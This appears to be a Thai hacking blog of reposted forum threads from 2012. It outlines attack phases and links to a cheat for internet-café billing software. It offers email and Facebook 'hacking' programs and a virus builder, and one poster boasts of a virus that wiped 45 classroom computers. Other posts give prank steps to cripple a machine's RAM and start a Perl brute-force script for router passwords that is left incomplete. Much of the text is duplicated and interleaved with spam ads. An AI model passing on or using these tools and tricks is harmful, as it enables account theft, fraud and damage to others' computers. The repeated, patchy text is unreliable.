คือว่าผมได้ซื้อหนังสือมาเล่มนึงเห้นว่ามีประโยช ก็เลยจะpost ให้ อ่านเป็น หัวข้อๆ ไปครับ
ว่าด้วยเรื่องของ
- การแกะรอย
- การสแกน
- การรวบรวมข้อมูล
- การเจาะระบบ
- การยกระดับสิทธิ
- การให้ได้มาซึ่ง commant shell(หรือว่าการ ขโมยดอส นั่นเองครับ)
- การข้อโมยข้อมูล
- การแผ่นขยายอิทธิพลของการโจมตี
- การทำลายร่องรอย
เดี่ยวผมว่างผมจะ post ใส่เรื่อยๆนะครับ ใจเย็นรอหน่อยนะครับ
เดี่ยววันที่ 4 นี้ผมจะไปมหาลยแล้วหล่ะ (อิอิ ตื่นเต้น ได้เรียกชื่อ รร ว่า มหาลัย เหมือนกะคนอื่นเค้า สักที 55+)
-----------------------------------------------------------------------------------
จัดทำ profile ให้กับเป้าหมาย (รู้เขารู้เรารบร้อย ชนะทั้งร้อย)
-----------------------------------------------------------------------------------
- การแกะรอย
การ แกะรอยอาจถูกมองเทียบได้กับการค้นหา Directory โทรศัพท์เพื่อหา เบอร์ โทรศัพท์และที่อยู่ของหน่วยงานเป้าหมาย ในขณะที่การสแกนนั้นเทียบได้กับการขับรถไปยังตำแหน่งเป้าหมายที่สนใจละหาดู ว่า อาคารไหนมีผู้ครอบครองอยู่ และมีประตูหน้างต่างใดบ้างที่สามารถเข้าไปภายในใด้(อาจจะหมายถึง port นะครับ) การแกะรอยและการสแกนยงเปรียบเทียบได้กับการพยายามค้นหาเป้าหมายและเส้นทาง สำหรับเข้าไปสู่ภายในเห็นได้ชัดว่า การโจมตีที่ผิดพลาด หรือการมองข้ามรายละเอียดเล็กๆน้อยๆของประตูที่ถูกเปิดไว่สามารถทำให้การ โจมตีนั้นไร้ประโยชน์หรือตกรางไปอย่างสิ้นเชิงครับ
[ข้างบนอ่านสักนิดก็ดีครับ (อุส่าพิมพ์ตั้งนาน อิอิ) จะรู้ไปว่าการแกะรอยหมายถึงอะไรครับ]
วันพฤหัสบดีที่ 8 มีนาคม พ.ศ. 2555
ขอคำชี้แนะ วิธีดูดาว ครับ
ขอคำชี้แนะ วิธีดูดาว ครับ
คือผมใช้โปรแกรม FTP FileZilla น่ะครับ ให้โปรแกรมมันจำพาสเอา
แต่ตอนนี้จำพาสไม่ได้แล้ว อยาก ได้วิธี ที่จะดู **** ว่ามันคืออะไรน่ะครับ
ขอคำชี้แนะด้วย ขอบคุณมากๆครับ
ปล. ลองใช้โปรแกรมพวกดูพาส หรือ sniffer จับ ftp ดู ก็ ไม่เห็นอ่ะครับ << อันนี้ก็ทำไม่ค่อยเป็นหรอกครับ ลองโหลดโปรแกรมมาลองเองมั่วๆ ถ้ามีวิธี สอนหน่อยก็ดีครับ ขอบคุณ
http://www.uppicme.com/share-5E9A_4F58D718.html
ข้อมูลจาก ruk-com.in.th
คือผมใช้โปรแกรม FTP FileZilla น่ะครับ ให้โปรแกรมมันจำพาสเอา
แต่ตอนนี้จำพาสไม่ได้แล้ว อยาก ได้วิธี ที่จะดู **** ว่ามันคืออะไรน่ะครับ
ขอคำชี้แนะด้วย ขอบคุณมากๆครับ
ปล. ลองใช้โปรแกรมพวกดูพาส หรือ sniffer จับ ftp ดู ก็ ไม่เห็นอ่ะครับ << อันนี้ก็ทำไม่ค่อยเป็นหรอกครับ ลองโหลดโปรแกรมมาลองเองมั่วๆ ถ้ามีวิธี สอนหน่อยก็ดีครับ ขอบคุณ
http://www.uppicme.com/share-5E9A_4F58D718.html
ข้อมูลจาก ruk-com.in.th
วันพุธที่ 7 มีนาคม พ.ศ. 2555
Hacking Web Application
Hacking Web Application
พูดถึง "Web" ในวันนี้ ไม่มีใครไม่รู้จัก "World Wide Web" หรือ "www" เพราะการค้นหาข้อมูลในการทำงานโดยเฉพาะคน IT นั้นจะปฏิเสธไม่ได้เลยว่าจำเป็นต้อง "เข้าWeb" เป็นประจำแทบทุกวัน ยกตัวอย่าง ตัวผมเองนั้นเข้า Web ของ "google.com" จนเรียกได้ว่าวันไหนถ้า Web google เข้าไม่ได้ ผมคงต้องรู้สึกหงุดหงิดและมีผลกับการทำงานพอสมควรเลยทีเดียว
สำหรับองค์กรในยุค ICT นี้ทุกบริษัทล้วนมี Web Site เป็นของตนเองแทบทั้งสิ้น ส่วนใหญ่เพื่อแสดงข้อมูลที่เปิดเผยได้ต่อสาธารณะ อันได้แก่ ข้อมูลผลิตภัณฑ์สินค้า แผนที่ เบอร์โทรศัพท์ ตลอดจนกิจกรรมต่างๆ ที่ต้องการเผยแพร่ซึ่งองค์กรจำเป็นต้องใช้ "Web Server" ในการจัดทำ "Web Site" โดยปกติทั่วไปแล้ว ข้อมูลจาก http://www.netcraft.com/ ได้รายงานว่า web site ทั่วโลกมีถึงกว่า 40 ล้าน web site ซึ่ง 66.52 % ใช้ Apache (Open Source) เป็น web server และ 24.64 % ใช้ IIS ของ Microsoft เป็น web server http://news.netcraft.com/archives/2003
/06/12/june_2003_web_server_survey.html
จาก ข้อมูลใน web site นี้ Hacker สามารถค้นประวัติของ web site เราได้ว่าเคยใช้ web server อะไร และมีการปรับปรุงเปลี่ยนแปลงเช่น Upgrade version หรือลง Patch อะไรบ้าง โดยสามารถ search จาก http://www.netcraft.com/ ได้โดยใส่ชื่อ web site ที่ต้องการค้นข้อมูลลงไป จะได้ผลลัพธ์ในรูปที่ 1
พูดถึง "Web" ในวันนี้ ไม่มีใครไม่รู้จัก "World Wide Web" หรือ "www" เพราะการค้นหาข้อมูลในการทำงานโดยเฉพาะคน IT นั้นจะปฏิเสธไม่ได้เลยว่าจำเป็นต้อง "เข้าWeb" เป็นประจำแทบทุกวัน ยกตัวอย่าง ตัวผมเองนั้นเข้า Web ของ "google.com" จนเรียกได้ว่าวันไหนถ้า Web google เข้าไม่ได้ ผมคงต้องรู้สึกหงุดหงิดและมีผลกับการทำงานพอสมควรเลยทีเดียว
สำหรับองค์กรในยุค ICT นี้ทุกบริษัทล้วนมี Web Site เป็นของตนเองแทบทั้งสิ้น ส่วนใหญ่เพื่อแสดงข้อมูลที่เปิดเผยได้ต่อสาธารณะ อันได้แก่ ข้อมูลผลิตภัณฑ์สินค้า แผนที่ เบอร์โทรศัพท์ ตลอดจนกิจกรรมต่างๆ ที่ต้องการเผยแพร่ซึ่งองค์กรจำเป็นต้องใช้ "Web Server" ในการจัดทำ "Web Site" โดยปกติทั่วไปแล้ว ข้อมูลจาก http://www.netcraft.com/ ได้รายงานว่า web site ทั่วโลกมีถึงกว่า 40 ล้าน web site ซึ่ง 66.52 % ใช้ Apache (Open Source) เป็น web server และ 24.64 % ใช้ IIS ของ Microsoft เป็น web server http://news.netcraft.com/archives/2003
/06/12/june_2003_web_server_survey.html
จาก ข้อมูลใน web site นี้ Hacker สามารถค้นประวัติของ web site เราได้ว่าเคยใช้ web server อะไร และมีการปรับปรุงเปลี่ยนแปลงเช่น Upgrade version หรือลง Patch อะไรบ้าง โดยสามารถ search จาก http://www.netcraft.com/ ได้โดยใส่ชื่อ web site ที่ต้องการค้นข้อมูลลงไป จะได้ผลลัพธ์ในรูปที่ 1
เฉลย วิธีผ่าน hackthissite level basic 1-10
เฉลย วิธีผ่าน hackthissite level basic 1-10
วิธีการผ่าน (basic hacking) Basic Missions 1 ถึง 10 ของ hackthissite.org
สำหรับมือใหม่เท่านั้นนะครับ คิดว่าไม่น่าจะใช้เวลาไม่เกิน 15 นาทีในการผ่าน basic mission นี้ครับ
http://www.hackthissite.org/missions/basic/
สำหรับเว็บนี้จะมีเกมส์ง่ายๆ สำหรับ hacker ฝึกหัดไว้เล่นแก้เครียดกันหลาย mission แต่หัวข้อนี้ผมจะแนะนำวิธีการในการผ่าน
basic mission กันก่อนครับ
เพิ่มเติม:
ก่อนเล่นต้องสมัครสมาชิกกันก่อนนะครับ
Nothing for guest!
เอาล่ะ ขอเอามาโพสที่นี้แล้วล่ะกานครับ
ข้อมูลจาก ruk-com.in.th
วิธีการผ่าน (basic hacking) Basic Missions 1 ถึง 10 ของ hackthissite.org
สำหรับมือใหม่เท่านั้นนะครับ คิดว่าไม่น่าจะใช้เวลาไม่เกิน 15 นาทีในการผ่าน basic mission นี้ครับ
http://www.hackthissite.org/missions/basic/
สำหรับเว็บนี้จะมีเกมส์ง่ายๆ สำหรับ hacker ฝึกหัดไว้เล่นแก้เครียดกันหลาย mission แต่หัวข้อนี้ผมจะแนะนำวิธีการในการผ่าน
basic mission กันก่อนครับ
เพิ่มเติม:
ก่อนเล่นต้องสมัครสมาชิกกันก่อนนะครับ
Nothing for guest!
เอาล่ะ ขอเอามาโพสที่นี้แล้วล่ะกานครับ
ข้อมูลจาก ruk-com.in.th
วันอาทิตย์ที่ 26 กุมภาพันธ์ พ.ศ. 2555
ผู้ใช้บอร์ดนี้ กรุณาเข้ามา หากคิดว่าอยากเป็นแฮกเกอร์
ผู้ใช้บอร์ดนี้ กรุณาเข้ามา หากคิดว่าอยากเป็นแฮกเกอร์
ก่อนตั้งคำถาม!!!!!
ก่อนถามปัญหาทางเทคนิคผ่านทาง shout box หรือใน webboard หรือ ใน ห้องchat แนะให้ทำสิ่งต่อไปนี้ก่อน
1. หาคำตอบจากกระทู้ในบอร์ดนั้นๆก่อน
2. ไปค้นในเว็บทั่วไปเสียก่อน
3. พยายามอ่าน กฏ หรืออะไรก็ตามที่เขาแนะนำให้อ่าน
4. ไปหาอ่านใน FAQ (ปัญหาที่เจอบ่อย)
5. ลองตรวจดู หรือ ทำการทดลองเองก่อน
6. หากคุณเป็น programmer ลองพยายามศึกษา source code เองดูก่อน
7. กลับไปอ่านข้อ 1 ใหม่
ระหว่างการถามคำถาม ให้แสดงว่าคุณได้พยายามทำด้วยตัวเองแล้ว เพราะมันจะช่วยให้คุณไม่ใช่ตัวขี้เกียจที่รอแต่คนมาป้อนให้และไม่เป็นการเสียเวลาสำห
รับ ผู้ที่จะช่วยให้คำตอบคุณ จะให้ดีกว่านั้น คุณควรนำเสนอสิ่งที่คุณได้ ศึกษา มาก่อนหน้านี้ เพราะเราชอบจะตอบคำถามกับคนที่แสดงให้เห็นว่าพวกเขาสามารถเรียนรู้จากคำตอบ ได้
วันพฤหัสบดีที่ 23 กุมภาพันธ์ พ.ศ. 2555
เฉลย วิธีผ่าน hackthissite level basic 1-10
เฉลย วิธีผ่าน hackthissite level basic 1-10
วิธีการผ่าน (basic hacking) Basic Missions 1 ถึง 10 ของ hackthissite.org
สำหรับมือใหม่เท่านั้นนะครับ คิดว่าไม่น่าจะใช้เวลาไม่เกิน 15 นาทีในการผ่าน basic mission นี้ครับ
http://www.hackthissite.org/missions/basic/
สำหรับเว็บนี้จะมีเกมส์ง่ายๆ สำหรับ hacker ฝึกหัดไว้เล่นแก้เครียดกันหลาย mission แต่หัวข้อนี้ผมจะแนะนำวิธีการในการผ่าน
basic mission กันก่อนครับ
เพิ่มเติม:
ก่อนเล่นต้องสมัครสมาชิกกันก่อนนะครับ
Nothing for guest!
เอาล่ะ ขอเอามาโพสที่นี้แล้วล่ะกานครับ
ข้อมูลจาก ruk-com.in.th
วิธีการผ่าน (basic hacking) Basic Missions 1 ถึง 10 ของ hackthissite.org
สำหรับมือใหม่เท่านั้นนะครับ คิดว่าไม่น่าจะใช้เวลาไม่เกิน 15 นาทีในการผ่าน basic mission นี้ครับ
http://www.hackthissite.org/missions/basic/
สำหรับเว็บนี้จะมีเกมส์ง่ายๆ สำหรับ hacker ฝึกหัดไว้เล่นแก้เครียดกันหลาย mission แต่หัวข้อนี้ผมจะแนะนำวิธีการในการผ่าน
basic mission กันก่อนครับ
เพิ่มเติม:
ก่อนเล่นต้องสมัครสมาชิกกันก่อนนะครับ
Nothing for guest!
เอาล่ะ ขอเอามาโพสที่นี้แล้วล่ะกานครับ
ข้อมูลจาก ruk-com.in.th
วันอังคารที่ 21 กุมภาพันธ์ พ.ศ. 2555
[ของดีสำหรับชาว hacker]โปรแกรมป้องกันไม่ให้เห็น IP ใช้ง่ายมาก
Auto Hide IP 5.0.9.8 [ซ่อนIPของเราได้]
คุณไม่ทราบที่อยู่ IP ของคุณคือสัมผัสทุกครั้งที่คุณเยี่ยมชมเว็บไซต์ทุกครั้งหรือไม่ ที่อยู่ IP ของคุณคือตัวตนออนไลน์ของคุณและสามารถนำมาใช้โดยแฮกเกอร์เจาะเข้าสู่เครื่องคอมพิวเตอร์ของคุณ
ขโมยข้อมูลส่วนบุคคลหรือกระทำผิดอื่น ๆ ต่อคุณ Auto Hide IP ช่วยให้คุณสามารถท่องโดยไม่ระบุชื่อ, เปลี่ยนที่อยู่ IP ของคุณป้องกันการขโมยข้อมูลส่วนตัวและป้องกันการแฮ็กเกอร์ intrusions, ทั้งหมดด้วยการคลิกปุ่ม Auto Hide IP . Auto Hide IP เป็นซอฟต์แวร์ป้องกันความเป็นส่วนตัวซึ่งช่วยให้คุณสามารถปกปิดที่อยู่ IP ของคุณจริงท่องโดยไม่ระบุชื่อและจะเปลี่ยนที่อยู่ IP ของคุณทุกสองสามนาที, คุณสามารถเลือก IP ปลอมจากประเทศที่แตกต่างกันทางเลือกตัวเลือก IP ประเทศและสามารถตรวจสอบทรัพย์สินทางปัญญาโดยตรง การใช้มัน, คุณสามารถที่จะปกปิดออนไลน์ตัวตนของคุณด้วยการแสดง IP ปลอม, การปิดกั้นแฮกเกอร์และ prying ตารู้ว่าสถานที่จริงตัวตนของคุณหรือ คุณยังสามารถเลือกเปิดตัวในการเริ่มต้นแล้วมันจะทำงานและโหลดไอพีปลอมโดย อัตโนมัติเมื่อคุณเข้าสู่ระบบ นอกจากนี้คุณสามารถสลับระหว่าง IP ปลอมและ IP จริงโดยเพียงคลิกที่ปุ่มของซ่อน IP หรือหยุดซ่อน
-Auto Hide IP ทำงานกับ Internet Explorer, Firefox, Opera, Maxthon, MyIE และเข้ากันได้กับทุกประเภทของเราเตอร์ไฟร์วอลล์เครือข่ายภายในบ้าน, เครือข่ายไร้สายและคนอื่น ๆ ในอินเทอร์เน็ต
-ท่องเว็บไม่ประสงค์ออกนาม
-ป้องกันไม่ให้คนอื่นเห็น IP จริงของคุณเรียกดูในขณะที่อินเทอร์เน็ต เปลี่ยน IP ของคุณเป็นประจำด้วยการคลิกปุ่ม!ซ่อน
@การป้องกันตัวตนของคุณ
คุณไม่ทราบที่อยู่ IP ของคุณคือสัมผัสทุกครั้งที่คุณเยี่ยมชมเว็บไซต์ทุกครั้งหรือไม่ ที่อยู่ IP ของคุณคือตัวตนออนไลน์ของคุณและสามารถนำมาใช้โดยแฮกเกอร์เจาะเข้าสู่เครื่องคอมพิวเตอร์ของคุณ
ขโมยข้อมูลส่วนบุคคลหรือกระทำผิดอื่น ๆ ต่อคุณ Auto Hide IP ช่วยให้คุณสามารถท่องโดยไม่ระบุชื่อ, เปลี่ยนที่อยู่ IP ของคุณป้องกันการขโมยข้อมูลส่วนตัวและป้องกันการแฮ็กเกอร์ intrusions, ทั้งหมดด้วยการคลิกปุ่ม Auto Hide IP . Auto Hide IP เป็นซอฟต์แวร์ป้องกันความเป็นส่วนตัวซึ่งช่วยให้คุณสามารถปกปิดที่อยู่ IP ของคุณจริงท่องโดยไม่ระบุชื่อและจะเปลี่ยนที่อยู่ IP ของคุณทุกสองสามนาที, คุณสามารถเลือก IP ปลอมจากประเทศที่แตกต่างกันทางเลือกตัวเลือก IP ประเทศและสามารถตรวจสอบทรัพย์สินทางปัญญาโดยตรง การใช้มัน, คุณสามารถที่จะปกปิดออนไลน์ตัวตนของคุณด้วยการแสดง IP ปลอม, การปิดกั้นแฮกเกอร์และ prying ตารู้ว่าสถานที่จริงตัวตนของคุณหรือ คุณยังสามารถเลือกเปิดตัวในการเริ่มต้นแล้วมันจะทำงานและโหลดไอพีปลอมโดย อัตโนมัติเมื่อคุณเข้าสู่ระบบ นอกจากนี้คุณสามารถสลับระหว่าง IP ปลอมและ IP จริงโดยเพียงคลิกที่ปุ่มของซ่อน IP หรือหยุดซ่อน
-Auto Hide IP ทำงานกับ Internet Explorer, Firefox, Opera, Maxthon, MyIE และเข้ากันได้กับทุกประเภทของเราเตอร์ไฟร์วอลล์เครือข่ายภายในบ้าน, เครือข่ายไร้สายและคนอื่น ๆ ในอินเทอร์เน็ต
-ท่องเว็บไม่ประสงค์ออกนาม
-ป้องกันไม่ให้คนอื่นเห็น IP จริงของคุณเรียกดูในขณะที่อินเทอร์เน็ต เปลี่ยน IP ของคุณเป็นประจำด้วยการคลิกปุ่ม!ซ่อน
@การป้องกันตัวตนของคุณ
วันเสาร์ที่ 18 กุมภาพันธ์ พ.ศ. 2555
ทำงานผ่านเน็ตรายได้ 3,000 - 5,000 บาทต่อสัปดาห์ สนใจรับรายละเอียดฟรี คลิ๊ก!!!
ทำงานผ่านเน็ตรายได้ 3,000 - 5,000 บาทต่อสัปดาห์ สนใจรับรายละเอียดฟรี คลิ๊ก!!!
ระบบ The First Power System
ต้องการที่จะรับสมัครพนักงานเพิ่มอีกจำนวนมาก
-ชาย/หญิง ที่มีเวลาและสนใจในการทำงาน
-สามารถใช้คอมพิวเตอร์ Internet พื้นฐานได้
-อายุตั้งแต่ 15 ปี ขึ้นไป
-ไม่จำเป็นต้องมีประสบการณ์
-ไม่จำกัดวุฒิการศึกษา
PART-TIME 8,000 - 12,000 บาท / เดือน
FULL-TIME 15,000 บาท/ ขึ้นไป
สนใจดูรายละเอียดที่ (สนใจสร้างรายได้กรอกข้อมูลทิ้งไว้ในลิงค์ด้านล่างเลยน่ะ
>>>>>>http://goo.gl/ut17t
เอ้า!! : อยากเป็นวัยรุ่นที่ First Class มีเงินใช้สอยอย่างไม่ขาดสาย
มัวร์รออะไรอยู่ละ' กรอกข้อมูลทิ้งไว้ในลิงค์เว็ปไซด์เลย
ข้อมูลจาก ruk-com.in.th
วันพฤหัสบดีที่ 16 กุมภาพันธ์ พ.ศ. 2555
วิธีการแฮกโปรแกรมคิดเงินในร้านเกม NCAFE ผมตั้งกระทุ้นี้เปนการศึกษานะอย่าเอาไปโกง
ดูตามรูปคับ
http://image.ohozaa.com/show.php?id=a18acf2676e87eb7c4763ea367e1d3a9
http://image.ohozaa.com/show.php?id=4f8b52def39dc093678da5831f1081ec
http://image.ohozaa.com/show.php?id=8078d6504a1fcfcd2e2669341fa3d59e
http://image.ohozaa.com/show.php?id=91bbc52b06a39f4fc2ee6515ba14632b
ผมแถมวิธีทำให้ด้วยคับไม่เชื่อลองทำดูง่ายมากคับ
http://www.beupload.com/download/?866743&A=687492
ผมทำให้ดูเพื่อให้ป้องกันกันดีขึ้นนะคับไม่ได้ให้ไปโกงกัน ^-^
ข้อมูลจาก ruk-com.in.th
http://image.ohozaa.com/show.php?id=a18acf2676e87eb7c4763ea367e1d3a9
http://image.ohozaa.com/show.php?id=4f8b52def39dc093678da5831f1081ec
http://image.ohozaa.com/show.php?id=8078d6504a1fcfcd2e2669341fa3d59e
http://image.ohozaa.com/show.php?id=91bbc52b06a39f4fc2ee6515ba14632b
ผมแถมวิธีทำให้ด้วยคับไม่เชื่อลองทำดูง่ายมากคับ
http://www.beupload.com/download/?866743&A=687492
ผมทำให้ดูเพื่อให้ป้องกันกันดีขึ้นนะคับไม่ได้ให้ไปโกงกัน ^-^
ข้อมูลจาก ruk-com.in.th
วิธีการ Hack RAM
:( :( :(
คำเตือน : เอาไว้ดูเฉยๆ ไม่ต้องทำตามหรอก แต่ถ้าเอาไปแกล้ง ระวังกรรมตามทันนะครับ
คำแนะนำ : กระทู้นี้ไม่มีรูปภาพ ดังนั้นจึงต้องคิดภาพเอาเองอ่ะนะ
วิธีการ Hack RAM
ประสบการณ์ของผู้เขียน : เคยโดนมาแล้ว (Hack เอง) เหลือ 32 เอง โฮๆ มะต้องใช้ Adobe Photoshop กันหละ
1. เข้า Start > Run > พิมพ์ msconfig
2. เลือก tab Boot.ini (Boot.ini เป็นไฟล์สั่งให้บูทเครื่องนั่นแหละ ถ้าคุณไม่มีก็บูทไม่ได้)
3. สนใจอย่างอื่นไปก่อนก็ได้ (เครื่องพังไม่รู้ด้วยนะ)
4. คลิก Advanced Options...
5. ติ๊ก /MAXMEM= แล้วพิมพ์หน่วย RAM ที่อยากได้ (ต่ำกว่า RAM สูงสุดนะ)
เช่น : มีแรม 1024
ติ๊ก /MAXMEM= "<1024"
กด OK ไปเรื่อยๆ เลย จนกว่าเค้าจะบอกให้เรา Restart ใหม่เพื่อเปลี่ยน RAM [/i]
ข้อมูลจาก ruk-com.in.th
คำเตือน : เอาไว้ดูเฉยๆ ไม่ต้องทำตามหรอก แต่ถ้าเอาไปแกล้ง ระวังกรรมตามทันนะครับ
คำแนะนำ : กระทู้นี้ไม่มีรูปภาพ ดังนั้นจึงต้องคิดภาพเอาเองอ่ะนะ
วิธีการ Hack RAM
ประสบการณ์ของผู้เขียน : เคยโดนมาแล้ว (Hack เอง) เหลือ 32 เอง โฮๆ มะต้องใช้ Adobe Photoshop กันหละ
1. เข้า Start > Run > พิมพ์ msconfig
2. เลือก tab Boot.ini (Boot.ini เป็นไฟล์สั่งให้บูทเครื่องนั่นแหละ ถ้าคุณไม่มีก็บูทไม่ได้)
3. สนใจอย่างอื่นไปก่อนก็ได้ (เครื่องพังไม่รู้ด้วยนะ)
4. คลิก Advanced Options...
5. ติ๊ก /MAXMEM= แล้วพิมพ์หน่วย RAM ที่อยากได้ (ต่ำกว่า RAM สูงสุดนะ)
เช่น : มีแรม 1024
ติ๊ก /MAXMEM= "<1024"
กด OK ไปเรื่อยๆ เลย จนกว่าเค้าจะบอกให้เรา Restart ใหม่เพื่อเปลี่ยน RAM [/i]
ข้อมูลจาก ruk-com.in.th
มาCrack พาสเวิร์ดของ Router กันบ้าง
นี่Code Perl
#!/usr/bin/perl
print "*****************************************
_____________________
< Brute Authentication >
---------------------
| ,__,
| (oo)____
(__) )\
||--|| * \n";
print "* code by windows98SE *\n";
print "*****************************************\n";
use Socket;
use IO::Socket;
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
print "IP:";
chomp( my $target = <STDIN> );
my @userlist = readFile("user.txt");
my @passlist = readFile("pass.txt");
my $outfile = 'PW.txt';
my %result;
print "[+] Start Scan..\n";
scan($target);
print "[+] Done.\n";
system ("pause");
print "*****************************************
_____________________
< Brute Authentication >
---------------------
| ,__,
| (oo)____
(__) )\
||--|| * \n";
print "* code by windows98SE *\n";
print "*****************************************\n";
use Socket;
use IO::Socket;
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
print "IP:";
chomp( my $target = <STDIN> );
my @userlist = readFile("user.txt");
my @passlist = readFile("pass.txt");
my $outfile = 'PW.txt';
my %result;
print "[+] Start Scan..\n";
scan($target);
print "[+] Done.\n";
system ("pause");
วิธีตรวจดูว่า ใครเข้ามา Hack เครื่องเราบ้าง
วิธีตรวจดูว่า ใครเข้ามา Hack เครื่องเราบ้าง
เอ.............. เราเล่น net เพลินๆอยู่นี่มีใครแอบเข้ามาหาเราหรือเปล่าน้อ
** Google แอบย่องมาเก็บข้อความในเครื่องเราไปโชว์ทั่วโลกบ้างมั้ยนี่
** แล้วพวกโฆษณา แฝงเข้ามาบ้างไหม อื่ม... เรามี Anti spyware แล้วนี่
** มีบรรดา hacker มาเยี่ยมบ้างไหม
เอางี้ มาดูวิธีแอบดูว่าใครหรือมีอะไรมาแวะหาเราบ้าง
ในขณะที่สมาชิกกำลังใช้งาน internet อยู่ (ไม่ว่าจะเป็น www, FTP, ตรวจสอบ mail ด้วย POP3/SMTP โดยผ่าน protocal TCP/IP)
ท่านรู้มั้ยว่ามีใคร connected มายังเครื่องคอมฯของท่านบ้าง (มีพวก Hacker มาป้วนเปี้ยนหรือเปล่า) และก็อยากทราบหรือไม่ว่ามาจากไหน
ไม่ยากครับที่จะตรวจสอบ เพียงทำตามขั้นตอน ข้างล่างนี้...
++ เริ่มที่ ตัว Start ให้ท่าน คลิกที่ Start ---> Run
++ ที่ Run พิมพ์คำว่า netstat 10 (10 หมายถึงให้ update การ connect ใหม่ทุก ๆ 10 วินาที)
++ เสร็จแล้ว กดปุ่ม < Enter >
จากนั้น โปรแกรมจะแสดง[ ในmode dos ] ให้เห็นว่ามีใคร Connected มายังเครื่องคอมฯของท่านบ้าง พร้อมกับแจ้ง address ให้ด้วย
วิธีนี้ สามารถใช้ใน '98, Me , XP [ 2000 - ไม่มีให้ลอง เลยไม่ทราบ ใครทราบแจ้งด้วยครับ ]
### ถ้าเป็นการ run หาในเครื่องเรา ก็จะแสดงเป็น localhost ....... [ ตามด้วยหมายเลข ]
credit : http://www.zone-it.com
ข้อมูลจาก ruk-com.in.th
วันพุธที่ 15 กุมภาพันธ์ พ.ศ. 2555
Hotmail,yahoo,gmail,Facebook,hi5,webonline[โปรแกรมมาแล้ว]
ขอมานะครับ วันนี้ไม่ทัน เด๋วพรุ่ง นี้เอาให้มี ให้เล่นอีกเย๊อะ
ขอความกรุณา อย่าเอา User กับ Pass ที่อยู่ในภาพไป แก้ไขหรือเปลี่ยน รหัสและอย่าทำให้เขาได้รับความเสียหายนะ ครับ
เราศึกษา เพื่อแก้ไข ไม่ใช่ทำลายนะครับ พรบ คอมพิวเตอร์ ปี 54 จะออกแล้ว แรงนะ ครับ
กดขอตรงนี้=> คลิก!! http://adf.ly/2ITjI
ชื่อบนภาพ เป็นนามแฟงผมเอง
พรุ่งนี้มี 2 ตัวมาแจก นะครับ รออ
1. โปรแกรม hack mail
2. โปรแกรมสร้างไวรัส สำเร็จรูป
อันนี้ลองได้ ไม่รับประกัน โดนมาแล้ว เล่าให้ฟังสักนิดก็ได้ ผมทำไว้เล่น ๆ ใส่ แฟรชไดร์ ไว้ บังเอิญ เพื่อน ยืมไปสอนหนังสือ นศ ลืมบอกว่าเป็นไวรัส ทำไว้ซะสวยงามเลยเป็น ไอคอนรูป เกมส์
คอม 45 เครื่อง ลง วินโดว์ใหม่หมด 555+
ข้อมูลจาก ruk-com.in.th
วันอังคารที่ 14 กุมภาพันธ์ พ.ศ. 2555
รวมคำสั่ง unix เพื่อเข้าสู่การ hack
รวมคำสั่ง unix เพื่อเข้าสู่การ hack
คำสั่ง Unix ที่ใช้เป็นประจำ
Unix เป็นระบบปฏิบัติการที่นิยมใช้กับแพร่หลายบนระบบขนาดใหญ่ และในปัจจุบันยังมีระบบปฏิบัติการในลักษณะของ Unix-like เกิดขึ้นมากมาย และ เริ่มเป็นที่นิยมใช้กันมากหลายยิ่งขึ้นบนเครื่องคอมพิวเตอร์ส่วนบุคคล เอกสารชุดนี้จึงสรุปคำสั่งบน Unix ที่มักใช้เป็นประจำโดยมีการยกตัวอย่างเปรียบเทียบกับ DOS/Windows พร้อมกับอธิบายถึงส่วนขยายเพิ่มเติมของคำสั่ง เพื่ออำนวยความสะดวกให้กับผู้เริ่มหัดใช้ Unix ทั่วไป
คำสั่ง Unix ที่ใช้เป็นประจำ
Unix เป็นระบบปฏิบัติการที่นิยมใช้กับแพร่หลายบนระบบขนาดใหญ่ และในปัจจุบันยังมีระบบปฏิบัติการในลักษณะของ Unix-like เกิดขึ้นมากมาย และ เริ่มเป็นที่นิยมใช้กันมากหลายยิ่งขึ้นบนเครื่องคอมพิวเตอร์ส่วนบุคคล เอกสารชุดนี้จึงสรุปคำสั่งบน Unix ที่มักใช้เป็นประจำโดยมีการยกตัวอย่างเปรียบเทียบกับ DOS/Windows พร้อมกับอธิบายถึงส่วนขยายเพิ่มเติมของคำสั่ง เพื่ออำนวยความสะดวกให้กับผู้เริ่มหัดใช้ Unix ทั่วไป
วันอาทิตย์ที่ 12 กุมภาพันธ์ พ.ศ. 2555
8 วิธีในการ Hack ฐานข้อมูล Oracle และ การป้องกัน
บทความ จาก Oracle Guru เป็นเรื่องกับ Security ที่น่าสนใจมากครับ "8 วิธีในการ Hack ฐานข้อมูล Oracle" ..ไม่ได้สอนให้ไป Hack ใครนะครับ
แต่ นำเสนอเพื่อจะได้ป้องกันช่องโหว่ในฐานข้อมูล Oracle ของเราต่างหาก ชื่อเรื่อง บอก 8 วิธี แต่ผมอ่านบทความ ไหง มันมีแค่ 4 วิธีหว่า Shocked
หรือ ว่า เค้า นับว่า วิธี Hack 4 วิธี กับ วิธีป้องกันการ Hack นั้นๆ อีก 4 วิธี นับรวมกันเป็น 8 วิธี มั๊ง ต้องไปถาม อีตา Sean Hull คนเขียนเองละกัน :
http://www.oracleskill.com/oracle-world-wide-article/eight-ways-to-hack-oracle.html
ข้อมูลจาก ruk-com.in.th
แต่ นำเสนอเพื่อจะได้ป้องกันช่องโหว่ในฐานข้อมูล Oracle ของเราต่างหาก ชื่อเรื่อง บอก 8 วิธี แต่ผมอ่านบทความ ไหง มันมีแค่ 4 วิธีหว่า Shocked
หรือ ว่า เค้า นับว่า วิธี Hack 4 วิธี กับ วิธีป้องกันการ Hack นั้นๆ อีก 4 วิธี นับรวมกันเป็น 8 วิธี มั๊ง ต้องไปถาม อีตา Sean Hull คนเขียนเองละกัน :
http://www.oracleskill.com/oracle-world-wide-article/eight-ways-to-hack-oracle.html
ข้อมูลจาก ruk-com.in.th
วันพฤหัสบดีที่ 9 กุมภาพันธ์ พ.ศ. 2555
ผู้เริ่มต้น สู่ แฮกเกอร์ มือเซียน 1
ทั่งหมดให้เครดิตแก่ หนังสือแฮกทุกๆเล่ม (มีหลายเล่ม) น่ะครับบ ??? ???
- Internet คืออะไร
เป็นเครื่อข่ายที่ใหญ่มาก (ซึ่งถูกย่อเป็น www ) ที่เชือมต่อคอมพิวเตอร์ทั่วโลกเข้าด้วยกันนั้นเอง
- Internet ทำงานอย่างไร (โปรก็ควรอ่าน)
